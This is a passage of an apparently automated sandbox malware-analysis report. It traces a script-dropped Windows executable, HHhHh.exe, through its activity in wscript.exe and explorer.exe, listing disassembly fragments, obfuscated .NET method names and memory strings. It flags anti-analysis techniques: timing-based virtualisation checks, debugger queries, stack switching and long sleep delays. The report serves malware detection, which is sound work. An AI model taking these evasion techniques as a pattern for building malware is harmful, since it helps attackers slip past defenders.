          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041D502 push eax; ret 4_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041D50B push eax; ret 4_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_004166E0 pushad ; retf 4_2_004167DA
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0040AEBD pushfd ; ret 4_2_0040AEBE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012909AD push ecx; mov dword ptr [esp], ecx4_2_012909B6
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6EFB02 push esp; retn 0000h5_2_0E6EFB03
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6EFB1E push esp; retn 0000h5_2_0E6EFB1F
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6EF9B5 push esp; retn 0000h5_2_0E6EFAE7
          Source: C:\Windows\explorer.exeCode function: 5_2_1126CB02 push esp; retn 0000h5_2_1126CB03
          Source: C:\Windows\explorer.exeCode function: 5_2_1126CB1E push esp; retn 0000h5_2_1126CB1F
          Source: C:\Windows\explorer.exeCode function: 5_2_1126C9B5 push esp; retn 0000h5_2_1126CAE7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C7C89 push ecx; ret 6_2_009C7C9C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D327FA pushad ; ret 6_2_04D327F9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D3225F pushad ; ret 6_2_04D327F9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D3283D push eax; iretd 6_2_04D32858
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D609AD push ecx; mov dword ptr [esp], ecx6_2_04D609B6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D39939 push es; iretd 6_2_04D39940
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_00908394 pushfd ; iretd 6_2_00908395
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091D4B5 push eax; ret 6_2_0091D508
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009044B7 push es; ret 6_2_009044BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091D502 push eax; ret 6_2_0091D508
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091D50B push eax; ret 6_2_0091D572
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091D56C push eax; ret 6_2_0091D572
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009166E0 pushad ; retf 6_2_009167DA
          Source: HHhHh.exe.0.drStatic PE information: section name: .text entropy: 7.977898409102027
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, YFDO78B3dyBKqsJeRM.csHigh entropy of concatenated method names: 'BsTWXMBY4', 'MlGVle9El', 'uyFpyA5UF', 'CXwv1jUNL', 'UpWTMP4QP', 'ecvxHSt9h', 'eC8idFCtDjrIiXHpiF', 'it1j21VULSrTwLtLq1', 'bShYZKgMo', 'CPh40rtYn'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, fvMv36VRIIyjbOhLr2k.csHigh entropy of concatenated method names: 'WeyDgZhMiq', 'D8NDwPS0JY', 'e1CDWPXuNB', 'sd1DVmpgZg', 'vpeD3DrBwn', 'cJXDpn4nfD', 'CYDDvKdE0V', 'wqJDE1kOVB', 'eXSDTrXQbk', 'Oy2DxvKcmc'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.csHigh entropy of concatenated method names: 'B13QHOl95e', 'VqCQduXgwa', 'eOmQ6Ykdal', 'tOIQPrFGmP', 'KwqQOD6fVu', 'rOsQjYacSG', 'J52Q2XofWY', 'lLBQyhaWqH', 'gaRQbFb1bS', 'GZEQhJPm8R'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, DnjhEJZrH59805e1tj.csHigh entropy of concatenated method names: 'SYGGNHUmVL', 'LXdGFovu0d', 'AYjY5OuAXO', 'U3xYc5eBy7', 'wC2GZZR7FV', 'roZGRDTMHN', 'xmnGXg2XI6', 'RnBGt9rCjM', 'cHKGs2sIqk', 'n1jGBOexrp'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, kkAjKaMbOgY15BMU2V.csHigh entropy of concatenated method names: 'JMm2ghAvem', 'iGk2w5OfPc', 'M6R2W3DeKD', 'F4M2Valgby', 'ECt23oTK2M', 'iHN2pX8RZ6', 'Qgt2vD7Xkj', 'T4q2E1BaLD', 'MmQ2TokwRg', 'eRv2xlwxnx'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, V7MKVcAbI46kQVW9k0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lcInupZO1D', 'Mu3nFh3L7M', 'BRKnzs4NOx', 'KLYQ5pkmQr', 'Wp3QcUBnDj', 'zdSQn4ptxD', 'Y7CQQVJfG5', 'aLqoUXMuiZntw6psDqN'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, WsUtYha7JiycjC3Xcp.csHigh entropy of concatenated method names: 'w0gjUe2tOI', 'PH3jgcFpN3', 'stAjWbHEeE', 'lynjVVaT7C', 'YKujp6lk0J', 'QTBjv984Lc', 'g5xjTvLeGG', 'HASjxgvDWa', 'GX9chRYAxXEnBGQhdMu', 'IPtSPWYhEMlNB36dVPo'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, M0EcBdetKyuEBtUKgB.csHigh entropy of concatenated method names: 'l0ikEj2Lep', 'v78kTEMEfN', 'AWWkopxaWE', 'c8tkL0q8bc', 'SkakilwA3e', 'ApkkaIZ2lx', 'hGAk1AkbNt', 'jgDkIW8kKP', 'jHUklm0F08', 'wg1kZ8Kfuy'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, RJwk7uqHNXtymbkcXC.csHigh entropy of concatenated method names: 'qpuGhegov1', 'P0lG0amQZb', 'ToString', 'uQEGdnaGWA', 'JpaG6J7iZx', 'pxoGPSmrOo', 'bE6GOeI4yW', 'Q9QGjQoktb', 'aiWG2C7aKT', 'xUiGyQAPJu'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, PseVlKsl9npQT7AhaE.csHigh entropy of concatenated method names: 'rH6PVcKL9S', 'TMBPpEgTTH', 'kx8PEjIpx0', 'aLEPTHCIe1', 'sLuPCMxjiQ', 'AG6Pqqr1Z0', 'ie7PGPXVp4', 'QnhPYbgHC4', 'lEuPDoYupj', 'VecP4uUd5x'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, SQMUrft2hqvHsrieyT.csHigh entropy of concatenated method names: 'nsijHWqCan', 'fJij6HA0Au', 'MKGjOOZEqt', 'SwTj2x2TYq', 'pyUjyvSeZH', 'RuBOAOncyJ', 'K29OfqLTFT', 'drhOShnKl1', 'kg0ONKQFu5', 'b4WOuhxVgp'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, vOIxEplE8AnWIAfrrt.csHigh entropy of concatenated method names: 'ToString', 'YKvqZ9Goop', 'vX0qLuT45u', 'GeEqeMWeA6', 'e4EqiafFl9', 'mDxqaYNGaY', 'Xm9qmAdeBu', 'sJAq1whoix', 'EukqI6HBrI', 'HbSq9dIHtf'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, odnbvwjktDSWWe4pEj.csHigh entropy of concatenated method names: 'Q6P2dYNQip', 'GuS2PMF6Tm', 'XBv2jdFpPS', 'uotjFqnvRx', 'tJLjzOx77q', 'kO6251bUjq', 'UIV2cj8u5v', 'h582npE2ji', 'YTV2QNF5TQ', 'XVN2Kpepio'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, oY2KAGdktRtY42PnXh.csHigh entropy of concatenated method names: 'kA2Yd8gP25', 'cAHY6N2DwY', 'a8dYPcFklw', 'DuFYOp59ua', 'q3GYjHaxiS', 're9Y2fSQVP', 'zcGYyI2YGC', 'Nw8YbsfNDK', 'OUcYhWmScs', 'zfVY0CyT5r'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, wjoM4miaX9WrPncB9X.csHigh entropy of concatenated method names: 'ryU6t2idBU', 'wRP6sfShS5', 'tk36BJPSxx', 'lB26rMNIhC', 'abv6AtgeWv', 'zee6flAsNF', 'rUt6S5BgqN', 'ij86NxjfM0', 'dBW6uZu38g', 'uEo6FASs9Y'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, MFWBRaSgXAlsGkiGZF.csHigh entropy of concatenated method names: 'Dispose', 'NnpcucFVtC', 'obonL44KC6', 'IKQMMyu2le', 'boxcFKMxtA', 'ndVczSmOZT', 'ProcessDialogKey', 'oHhn5K9QOX', 'I2AncLNJos', 'twlnnZNDKd'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, RWH8U3x1RFh1MUc0ly.csHigh entropy of concatenated method names: 'iqlc2nTSwi', 'utqcy3purM', 'JGFchSgxDD', 'i8Mc0hBG1s', 'KgZcClqVwu', 'HfEcqm7oc6', 'XKRcCaf2M9AknOwyEl', 'kptRfWERWrdWPlC38I', 'mbkcc7glRr', 'CQwcQGkfwF'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, Y86arQv56RqLK7lxN8.csHigh entropy of concatenated method names: 'kFQO3gCMlO', 'xamOvQUS29', 'CmPPepCMVl', 'u7gPiayuAl', 'mihPaPIoHu', 'cVQPmu4GJv', 'VyDP1KiLFq', 'wlVPIjuyar', 'MG6P9FStoT', 'VLcPl21tg9'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, uH6vU8V8hKc8o2xpTyb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'c934tZZHG1', 'hS24s6MDka', 'POc4BBVJ8k', 'HFu4rZ5RjM', 'ArO4AftYr9', 'ARv4fNniit', 'ist4SYiqE2'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, brnWriW6QiT2akgS1J.csHigh entropy of concatenated method names: 'hmJClC4ZqV', 'haKCRG8Vnt', 'O7aCtpf7MO', 'sXvCs0lLhT', 'DrvCL9ZWph', 'zK2Cem4yYW', 'EfdCi5KEpW', 'qPWCagtlBF', 'eH8CmeKQoG', 'bfVC1bwLcK'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, My7AEnEGgddFOKOHKB.csHigh entropy of concatenated method names: 'RddDc7Dp3Q', 'eR7DQllMGK', 'Sg6DKBqdou', 'iIIDdHLY1w', 'YZuD6pqrBb', 'iytDOvD3HH', 'TPKDjQfDum', 'qJFYSc77sh', 'KhsYNebb0C', 'YkUYu90XaV'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, ObuY3EzelE09x3dtVg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CtVDkiTWdE', 'w83DCsnkpZ', 'Yh7DqKSY63', 'rYJDG4VWsM', 'JmmDYQiwM4', 'MG7DDUUi1g', 'nX8D4RgTFl'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, zN2gLZkwMSpQA3gaY4.csHigh entropy of concatenated method names: 'cOjYokAUuM', 'PFiYLgvAlR', 'htLYenGmVC', 'SomYiEmMGp', 'FulYtr7KrM', 'J7hYaXJ7Jh', 'Next', 'Next', 'Next', 'NextBytes'
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\HHhHh.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 909904 second address: 90990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 909B7E second address: 909B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: 88C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: 6BB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: 88C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1808Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8129Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 901Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 852Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow / User API: threadDelayed 9842Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-13756
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\wscript.exeAPI coverage: 1.6 %
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe TID: 5948Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5836Thread sleep count: 1808 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5836Thread sleep time: -3616000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5836Thread sleep count: 8129 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5836Thread sleep time: -16258000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep count: 132 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep time: -264000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep count: 9842 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep time: -19684000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C23CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,6_2_009C23CE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000003.2102632040.0000020734E38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102469274.0000020734DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bRoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1uWNJ
          Source: wscript.exe, 00000000.00000003.2111597853.0000020734DAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102832884.0000020734D9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110811181.0000020734DAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2111315899.0000020734DAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2111847662.0000020734DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bRoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1uWNYcmvIf
          Source: wscript.exe, 00000000.00000003.2097920261.000002073488B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101278008.00000207348A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094053067.0000020734870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2096800451.000002073488B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093147100.000002073486F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094169799.000002073487B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099646800.000002073489E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094703457.0000020734887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2098729542.0000020734894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101410771.00000207348A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1u
          Source: wscript.exe, 00000000.00000003.2121428986.0000020734FA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123896454.0000020734E45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRisVRoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz
          Source: wscript.exe, 00000000.00000003.2082217621.0000020734FE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082784146.0000020734FE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078931964.0000020734FE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2084727269.000002073500C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082523938.0000020734FE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2081423094.0000020734FE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083329701.0000020734FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086044332.000002073500C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083764851.0000020735001000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088075126.0000020735015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1uf
          Source: wscript.exe, 00000000.00000003.2060374399.0000020734E80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2060900694.0000020734E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s&&4PN9??C+mK0HNkPaoCwMjYUlGvlxufC5sr2znawu??ZTZeUfEZO??1q72pqbYtPDIrvZNLe2#7e3&&??Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1u??N##ac&&+x#mduMsw0tM4&&1p
          Source: wscript.exe, 00000000.00000003.2066616044.000002073485F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070232121.0000020734864000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069476462.0000020734864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s&&4PN9??C+mK0HNkPaoCwMjYUlGvlxufC5sr2znawu??ZTZeUfEZO??1q72pqbYtPDIrvZNLe2#7e3&&??Skj9FIy&&l@&&RUED4yIBH2QL3QujPCxhSjE/ewQcl5gRis#RoFQQaDjKvahvxghgFSMTu+cDD6uIlEy+vz@UM8&&FPHU1u??N##ac&&+x#mduMsw0tM4&&1p%
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0040ACF0 LdrLoadDll,4_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C0124 mov eax, dword ptr fs:[00000030h]4_2_012C0124
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01350115 mov eax, dword ptr fs:[00000030h]4_2_01350115
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133A118 mov ecx, dword ptr fs:[00000030h]4_2_0133A118
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133A118 mov eax, dword ptr fs:[00000030h]4_2_0133A118
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133A118 mov eax, dword ptr fs:[00000030h]4_2_0133A118
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133A118 mov eax, dword ptr fs:[00000030h]4_2_0133A118
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01328158 mov eax, dword ptr fs:[00000030h]4_2_01328158
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01324144 mov eax, dword ptr fs:[00000030h]4_2_01324144
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01324144 mov eax, dword ptr fs:[00000030h]4_2_01324144
